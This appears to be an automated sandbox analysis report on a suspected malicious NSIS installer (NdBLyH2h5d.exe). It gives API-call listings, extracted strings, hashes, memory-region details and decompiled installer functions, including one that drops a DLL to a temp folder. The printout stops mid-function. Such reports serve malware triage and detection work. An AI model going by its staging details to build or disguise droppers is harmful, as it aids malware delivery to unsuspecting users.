                                                                              0x00402d00
                                                                              0x00402d06
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00402d0c
                                                                              0x00402d13
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00402d19
                                                                              0x00402d20
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00402d26
                                                                              0x00402d2d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00402d2f
                                                                              0x00402d36
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00402d38
                                                                              0x00402d3b
                                                                              0x00402d3d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00402d43
                                                                              0x00402d46
                                                                              0x00402d4c
                                                                              0x00402d50
                                                                              0x00402d56
                                                                              0x00402d5e
                                                                              0x00402d5e
                                                                              0x00402d61
                                                                              0x00402d61
                                                                              0x00402d64
                                                                              0x00402d66
                                                                              0x00402d68
                                                                              0x00402d68
                                                                              0x00000000
                                                                              0x00402d66
                                                                              0x00402d58
                                                                              0x00402d5c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00402da6
                                                                              0x00402da6
                                                                              0x00402dac
                                                                              0x00402dbc
                                                                              0x00402dbc
                                                                              0x00402dbf
                                                                              0x00402dc5
                                                                              0x00402dc7
                                                                              0x00402dc7
                                                                              0x00402dcf
                                                                              0x00402dd3
                                                                              0x00402dd8
                                                                              0x00402dd8
                                                                              0x00000000
                                                                              0x00402dd3

                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 00402C45
                                                                              • GetModuleFileNameA.KERNEL32(C:\Users\user\Desktop,00000400,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402C6A
                                                                                • Part of subcall function 00405690: GetFileAttributesA.KERNELBASE(00000003,00402C7D,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405694
                                                                                • Part of subcall function 00405690: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 004056B6
                                                                              • GetFileSize.KERNEL32(00000000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402CA0
                                                                              • DestroyWindow.USER32(00000000,00795938,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402DD8
                                                                              • GlobalAlloc.KERNEL32(00000040,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402E14
                                                                              Strings
                                                                              • "C:\Users\user\Desktop\NdBLyH2h5d.exe" , xrefs: 00402C41
                                                                              • soft, xrefs: 00402D26
                                                                              • C:\Users\user\Desktop, xrefs: 00402C51, 00402C5B, 00402C77, 00402C97
                                                                              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402C37
                                                                              • Error launching installer, xrefs: 00402C8D
                                                                              • The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t, xrefs: 00402E42
                                                                              • Inst, xrefs: 00402D19
                                                                              • Null, xrefs: 00402D2F
                                                                              • verifying installer: %d%%, xrefs: 00402D89
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C3D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: File$AllocAttributesCountCreateDestroyGlobalModuleNameSizeTickWindow
                                                                              • String ID: "C:\Users\user\Desktop\NdBLyH2h5d.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Null$The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t$soft$verifying installer: %d%%
                                                                              • API String ID: 2181728824-204383345
                                                                              • Opcode ID: 070d32362b5f02bfa4bcb615afc2903e7a1d408c6553ea38cbd2013ea11f58e9
                                                                              • Instruction ID: 2bc3342fd27a022da09e110317cf5b670322b105189d6b48e3606e9cef6b214d
                                                                              • Opcode Fuzzy Hash: 070d32362b5f02bfa4bcb615afc2903e7a1d408c6553ea38cbd2013ea11f58e9
                                                                              • Instruction Fuzzy Hash: 8561CE30900215EBDB219F64DE49B9EBBB4BF45714F20813AF900B22E2D7BC9D418B9C
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0040179D, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 151stringtimeCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 57%
                                                                              			E0040179D(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				long _t49;
				long _t62;
				signed char _t63;
				long _t64;
				void* _t66;
				long _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				void* _t82;
				CHAR* _t84;
				void* _t87;

				_t77 = __ebx;
				_t84 = E00402A9A(0x31);
				 *(_t87 - 0x34) = _t84;
				 *(_t87 + 8) =  *(_t87 - 0x24) & 0x00000007;
				_t33 = E00405538(_t84);
				_push(_t84);
				if(_t33 == 0) {
					lstrcatA(E004054CC(E004059BF(0x409c18, "C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409c18);
					E004059BF();
				}
				E00405BFB(0x409c18);
				while(1) {
					__eflags =  *(_t87 + 8) - 3;
					if( *(_t87 + 8) >= 3) {
						_t66 = E00405C94(0x409c18);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t87 - 0x18);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t87 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t87 + 8) = _t72;
					}
					__eflags =  *(_t87 + 8) - _t77;
					if( *(_t87 + 8) == _t77) {
						_t63 = GetFileAttributesA(0x409c18); // executed
						_t64 = _t63 & 0x000000fe;
						__eflags = _t64;
						SetFileAttributesA(0x409c18, _t64); // executed
					}
					__eflags =  *(_t87 + 8) - 1;
					_t41 = E00405690(0x409c18, 0x40000000, (0 |  *(_t87 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t87 - 8) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t87 + 8) - _t77;
					if( *(_t87 + 8) != _t77) {
						E00404D62(0xffffffe2,  *(_t87 - 0x34));
						__eflags =  *(_t87 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t87 - 4)) = 1;
						}
						L31:
						 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t87 - 4));
						__eflags =  *0x7a3008;
						goto L32;
					} else {
						E004059BF(0x40a418, 0x7a4000);
						E004059BF(0x7a4000, 0x409c18);
						E004059E1(_t77, 0x40a418, 0x409c18, "C:\Users\hardz\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll",  *((intOrPtr*)(_t87 - 0x10)));
						E004059BF(0x7a4000, 0x40a418);
						_t62 = E004052BF("C:\Users\hardz\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll",  *(_t87 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x7a3008 =  *0x7a3008 + 1;
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409c18);
								_push(0xfffffffa);
								E00404D62();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404D62(0xffffffea,  *(_t87 - 0x34));
				 *0x4092a0 =  *0x4092a0 + 1;
				_push(_t77);
				_push(_t77);
				_push( *(_t87 - 8));
				_push( *((intOrPtr*)(_t87 - 0x1c)));
				_t43 = E00402EBD(); // executed
				 *0x4092a0 =  *0x4092a0 - 1;
				__eflags =  *(_t87 - 0x18) - 0xffffffff;
				_t82 = _t43;
				if( *(_t87 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t87 - 8), _t87 - 0x18, _t77, _t87 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t87 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t87 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t87 - 8)); // executed
				__eflags = _t82 - _t77;
				if(_t82 >= _t77) {
					goto L31;
				} else {
					__eflags = _t82 - 0xfffffffe;
					if(_t82 != 0xfffffffe) {
						E004059E1(_t77, _t82, 0x409c18, 0x409c18, 0xffffffee);
					} else {
						E004059E1(_t77, _t82, 0x409c18, 0x409c18, 0xffffffe9);
						lstrcatA(0x409c18,  *(_t87 - 0x34));
					}
					_push(0x200010);
					_push(0x409c18);
					E004052BF();
					goto L29;
				}
				goto L33;
			}


















                                                                              0x0040179d
                                                                              0x004017a4
                                                                              0x004017ad
                                                                              0x004017b0
                                                                              0x004017b3
                                                                              0x004017b8
                                                                              0x004017c0
                                                                              0x004017dc
                                                                              0x004017c2
                                                                              0x004017c2
                                                                              0x004017c3
                                                                              0x004017c3
                                                                              0x004017e2
                                                                              0x004017ec
                                                                              0x004017ec
                                                                              0x004017f0
                                                                              0x004017f3
                                                                              0x004017f8
                                                                              0x004017fa
                                                                              0x004017fc
                                                                              0x00401801
                                                                              0x00401801
                                                                              0x0040180c
                                                                              0x0040180c
                                                                              0x0040181d
                                                                              0x0040181f
                                                                              0x0040181f
                                                                              0x00401820
                                                                              0x00401820
                                                                              0x00401823
                                                                              0x00401826
                                                                              0x00401829
                                                                              0x0040182f
                                                                              0x0040182f
                                                                              0x00401833
                                                                              0x00401833
                                                                              0x0040183b
                                                                              0x0040184a
                                                                              0x0040184f
                                                                              0x00401852
                                                                              0x00401855
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00401857
                                                                              0x0040185a
                                                                              0x004018b4
                                                                              0x004018b9
                                                                              0x004015ca
                                                                              0x004026da
                                                                              0x004026da
                                                                              0x0040292f
                                                                              0x00402932
                                                                              0x00402932
                                                                              0x00000000
                                                                              0x0040185c
                                                                              0x00401862
                                                                              0x0040186d
                                                                              0x0040187a
                                                                              0x00401885
                                                                              0x0040189b
                                                                              0x0040189b
                                                                              0x0040189e
                                                                              0x00000000
                                                                              0x004018a4
                                                                              0x004018a4
                                                                              0x004018a5
                                                                              0x004018c2
                                                                              0x00402938
                                                                              0x00402938
                                                                              0x00402938
                                                                              0x004018a7
                                                                              0x004018a7
                                                                              0x004018a8
                                                                              0x00401495
                                                                              0x00402293
                                                                              0x00402293
                                                                              0x00402293
                                                                              0x004018a5
                                                                              0x0040189e
                                                                              0x0040293a
                                                                              0x0040293e
                                                                              0x0040293e
                                                                              0x004018d2
                                                                              0x004018d7
                                                                              0x004018dd
                                                                              0x004018de
                                                                              0x004018df
                                                                              0x004018e2
                                                                              0x004018e5
                                                                              0x004018ea
                                                                              0x004018f0
                                                                              0x004018f4
                                                                              0x004018f6
                                                                              0x004018fe
                                                                              0x0040190a
                                                                              0x004018f8
                                                                              0x004018f8
                                                                              0x004018fc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004018fc
                                                                              0x00401913
                                                                              0x00401919
                                                                              0x0040191b
                                                                              0x00000000
                                                                              0x00401921
                                                                              0x00401921
                                                                              0x00401924
                                                                              0x0040193c
                                                                              0x00401926
                                                                              0x00401929
                                                                              0x00401932
                                                                              0x00401932
                                                                              0x00401941
                                                                              0x00401946
                                                                              0x0040228e
                                                                              0x00000000
                                                                              0x0040228e
                                                                              0x00000000

                                                                              APIs
                                                                              • lstrcatA.KERNEL32(00000000,00000000,Rcxlxosdkhvclf,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017DC
                                                                              • CompareFileTime.KERNEL32(-00000014,?,Rcxlxosdkhvclf,Rcxlxosdkhvclf,00000000,00000000,Rcxlxosdkhvclf,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401806
                                                                              • GetFileAttributesA.KERNELBASE(Rcxlxosdkhvclf,Rcxlxosdkhvclf,00000000,00000000,Rcxlxosdkhvclf,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401829
                                                                              • SetFileAttributesA.KERNELBASE(Rcxlxosdkhvclf,00000000), ref: 00401833
                                                                                • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
                                                                                • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078EF38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                                                                • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078EF38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                                                                • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078EF38,00789938), ref: 00404DBE
                                                                                • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                                                                • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                                                                • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                                                                • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: FileMessageSend$Attributeslstrcatlstrlen$CompareTextTimeWindowlstrcpyn
                                                                              • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll$Rcxlxosdkhvclf
                                                                              • API String ID: 1152937526-3363688924
                                                                              • Opcode ID: 23fd552162e1cb78e30f3aeb6829a794e94d33adf5882a54a3d0554285ad8cdc
                                                                              • Instruction ID: f975a3bedda6f2933beab8fd4359c2ae6630d988b8a67772af92d786c35f871c
                                                                              • Opcode Fuzzy Hash: 23fd552162e1cb78e30f3aeb6829a794e94d33adf5882a54a3d0554285ad8cdc
                                                                              • Instruction Fuzzy Hash: 0141E471901504BBDF117FA5CD869AF3AA9EF42328B20423BF512F11E1C73C4A41CAAD
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00402EBD, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 173fileCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 95%
                                                                              			E00402EBD(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
				struct _OVERLAPPED* _v8;
				long _v12;
				void* _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				char _v92;
				void* _t68;
				void* _t69;
				int _t74;
				long _t75;
				intOrPtr _t79;
				long _t80;
				void* _t82;
				int _t84;
				void* _t99;
				void* _t100;
				long _t101;
				int _t102;
				long _t103;
				int _t104;
				intOrPtr _t105;
				long _t106;
				void* _t107;

				_t102 = _a16;
				_t99 = _a12;
				_v12 = _t102;
				if(_t99 == 0) {
					_v12 = 0x8000;
				}
				_v8 = 0;
				_v16 = _t99;
				if(_t99 == 0) {
					_v16 = 0x78d938;
				}
				_t66 = _a4;
				if(_a4 >= 0) {
					E004030FF( *0x7a2fd8 + _t66);
				}
				_t68 = E004030CD( &_a16, 4); // executed
				if(_t68 == 0) {
					L44:
					_push(0xfffffffd);
					goto L45;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t99 != 0) {
							if(_a16 < _t102) {
								_t102 = _a16;
							}
							if(E004030CD(_t99, _t102) != 0) {
								_v8 = _t102;
								L47:
								return _v8;
							} else {
								goto L44;
							}
						}
						if(_a16 <= 0) {
							goto L47;
						}
						while(1) {
							_t103 = _v12;
							if(_a16 < _t103) {
								_t103 = _a16;
							}
							if(E004030CD(0x789938, _t103) == 0) {
								goto L44;
							}
							_t74 = WriteFile(_a8, 0x789938, _t103,  &_a12, 0); // executed
							if(_t74 == 0 || _t103 != _a12) {
								L30:
								_push(0xfffffffe);
								L45:
								_pop(_t69);
								return _t69;
							} else {
								_v8 = _v8 + _t103;
								_a16 = _a16 - _t103;
								if(_a16 > 0) {
									continue;
								}
								goto L47;
							}
						}
						goto L44;
					}
					_t75 = GetTickCount();
					_t13 =  &_a16;
					 *_t13 = _a16 & 0x7fffffff;
					_v20 = _t75;
					 *0x40b038 = 0xb;
					 *0x40b050 = 0;
					_a4 = _a16;
					if( *_t13 <= 0) {
						goto L47;
					}
					while(1) {
						L10:
						_t104 = 0x4000;
						if(_a16 < 0x4000) {
							_t104 = _a16;
						}
						if(E004030CD(0x789938, _t104) == 0) {
							goto L44;
						}
						_a16 = _a16 - _t104;
						 *0x40b028 = 0x789938;
						 *0x40b02c = _t104;
						while(1) {
							_t100 = _v16;
							 *0x40b030 = _t100;
							 *0x40b034 = _v12;
							_t79 = E00405D9D(0x40b028);
							_v28 = _t79;
							if(_t79 < 0) {
								break;
							}
							_t105 =  *0x40b030; // 0x78ef38
							_t106 = _t105 - _t100;
							_t80 = GetTickCount();
							_t101 = _t80;
							if(( *0x4092a0 & 0x00000001) != 0 && (_t80 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t107 = _t107 + 0xc;
								E00404D62(0,  &_v92);
								_v20 = _t101;
							}
							if(_t106 == 0) {
								if(_a16 > 0) {
									goto L10;
								}
								goto L47;
							} else {
								if(_a12 != 0) {
									_v12 = _v12 - _t106;
									_v8 = _v8 + _t106;
									_t82 =  *0x40b030; // 0x78ef38
									_v16 = _t82;
									if(_v12 < 1) {
										goto L47;
									}
									L25:
									if(_v28 != 4) {
										continue;
									}
									goto L47;
								}
								_t84 = WriteFile(_a8, _v16, _t106,  &_v24, 0); // executed
								if(_t84 == 0 || _v24 != _t106) {
									goto L30;
								} else {
									_v8 = _v8 + _t106;
									goto L25;
								}
							}
						}
						_push(0xfffffffc);
						goto L45;
					}
					goto L44;
				}
			}



























                                                                              0x00402ec5
                                                                              0x00402ec9
                                                                              0x00402ed0
                                                                              0x00402ed3
                                                                              0x00402ed5
                                                                              0x00402ed5
                                                                              0x00402ede
                                                                              0x00402ee1
                                                                              0x00402ee4
                                                                              0x00402ee6
                                                                              0x00402ee6
                                                                              0x00402eed
                                                                              0x00402ef2
                                                                              0x00402efd
                                                                              0x00402efd
                                                                              0x00402f08
                                                                              0x00402f0f
                                                                              0x004030bb
                                                                              0x004030bb
                                                                              0x00000000
                                                                              0x00402f15
                                                                              0x00402f19
                                                                              0x0040305e
                                                                              0x004030ab
                                                                              0x004030ad
                                                                              0x004030ad
                                                                              0x004030b9
                                                                              0x004030c0
                                                                              0x004030c3
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004030b9
                                                                              0x00403063
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040306a
                                                                              0x0040306a
                                                                              0x00403070
                                                                              0x00403072
                                                                              0x00403072
                                                                              0x0040307e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040308b
                                                                              0x00403093
                                                                              0x00403058
                                                                              0x00403058
                                                                              0x004030bd
                                                                              0x004030bd
                                                                              0x00000000
                                                                              0x0040309a
                                                                              0x0040309a
                                                                              0x0040309d
                                                                              0x004030a4
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004030a6
                                                                              0x00403093
                                                                              0x00000000
                                                                              0x0040306a
                                                                              0x00402f1f
                                                                              0x00402f25
                                                                              0x00402f25
                                                                              0x00402f2c
                                                                              0x00402f32
                                                                              0x00402f39
                                                                              0x00402f3f
                                                                              0x00402f42
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00402f4d
                                                                              0x00402f4d
                                                                              0x00402f4d
                                                                              0x00402f55
                                                                              0x00402f57
                                                                              0x00402f57
                                                                              0x00402f63
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00402f69
                                                                              0x00402f6c
                                                                              0x00402f72
                                                                              0x00402f78
                                                                              0x00402f78
                                                                              0x00402f83
                                                                              0x00402f89
                                                                              0x00402f8e
                                                                              0x00402f95
                                                                              0x00402f98
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00402f9e
                                                                              0x00402fa4
                                                                              0x00402fa6
                                                                              0x00402fb3
                                                                              0x00402fb5
                                                                              0x00402fe3
                                                                              0x00402fe9
                                                                              0x00402ff2
                                                                              0x00402ff7
                                                                              0x00402ff7
                                                                              0x00402ffe
                                                                              0x0040304c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00403000
                                                                              0x00403003
                                                                              0x00403025
                                                                              0x00403028
                                                                              0x0040302b
                                                                              0x00403034
                                                                              0x00403037
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040303d
                                                                              0x00403041
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00403047
                                                                              0x00403011
                                                                              0x00403019
                                                                              0x00000000
                                                                              0x00403020
                                                                              0x00403020
                                                                              0x00000000
                                                                              0x00403020
                                                                              0x00403019
                                                                              0x00402ffe
                                                                              0x00403054
                                                                              0x00000000
                                                                              0x00403054
                                                                              0x00000000
                                                                              0x00402f4d

                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 00402F1F
                                                                              • GetTickCount.KERNEL32 ref: 00402FA6
                                                                              • MulDiv.KERNEL32(7FFFFFFF,00000064,00000000), ref: 00402FD3
                                                                              • wsprintfA.USER32 ref: 00402FE3
                                                                              • WriteFile.KERNELBASE(00000000,00000000,0078EF38,7FFFFFFF,00000000), ref: 00403011
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: CountTick$FileWritewsprintf
                                                                              • String ID: ... %d%%$8x
                                                                              • API String ID: 4209647438-795837185
                                                                              • Opcode ID: 200e9f51f80e72fe4fcb6a06ea592b3ad35ad2676aa37a9b98c0ec53b28c93f4
                                                                              • Instruction ID: 8577ea5e15ae9603690e1c5729624cd70e3502ed31cd2bd6b1ef147789401905
                                                                              • Opcode Fuzzy Hash: 200e9f51f80e72fe4fcb6a06ea592b3ad35ad2676aa37a9b98c0ec53b28c93f4
                                                                              • Instruction Fuzzy Hash: 9E61AB3191220AEBCF10DF65DA48A9F7BB8EB04755F10417BF911B32C0D3789A40CBAA
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 026311C3, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 344memoryfileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 026314E4
                                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 02631540
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220733017.0000000002630000.00000040.00000001.sdmp, Offset: 02630000, based on PE: false
                                                                              Similarity
                                                                              • API ID: AllocCreateFileVirtual
                                                                              • String ID: c318a9ec85894c65bfe21401dced2a03
                                                                              • API String ID: 1475775534-1039402140
                                                                              • Opcode ID: f8f2436e48ae6007cc3b6c86551d00bf0c3e46f193526df9e5480f1de1160e45
                                                                              • Instruction ID: be7348bae1fa8b6e948d77a7e8d7d5f82dbd225898c7366895e6d790299ff7fb
                                                                              • Opcode Fuzzy Hash: f8f2436e48ae6007cc3b6c86551d00bf0c3e46f193526df9e5480f1de1160e45
                                                                              • Instruction Fuzzy Hash: F9E14C31D44388EDEB22DBE4DC05BEDBBB5AF05710F2440DAE608FA291D7B50A94DB19
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 026306F1, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 026307F3
                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 026309C0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220733017.0000000002630000.00000040.00000001.sdmp, Offset: 02630000, based on PE: false
                                                                              Similarity
                                                                              • API ID: CreateFileFreeVirtual
                                                                              • String ID:
                                                                              • API String ID: 204039940-0
                                                                              • Opcode ID: 147d44b8edf9c1b8b83a1f4fe16a49ba33ba8049b8a36b976b4db1dee66b95c3
                                                                              • Instruction ID: 9531024e130c52a6f98a0d1b75a107f93f46c0ced1a52ee971233bcf40a4c409
                                                                              • Opcode Fuzzy Hash: 147d44b8edf9c1b8b83a1f4fe16a49ba33ba8049b8a36b976b4db1dee66b95c3
                                                                              • Instruction Fuzzy Hash: B9A10030D01208EFEF12DFE4C889BADBBB2BF09315F20949AE515BA2A0D3755A55DF14
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004015D5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 84%
                                                                              			E004015D5(struct _SECURITY_ATTRIBUTES* __ebx, void* __eflags) {
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t27;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E00402A9A(0xfffffff0);
				_t27 = E0040555F(_t25);
				if( *_t25 != __ebx && _t27 != __ebx) {
					do {
						_t29 = E004054F7(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L5:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L5;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
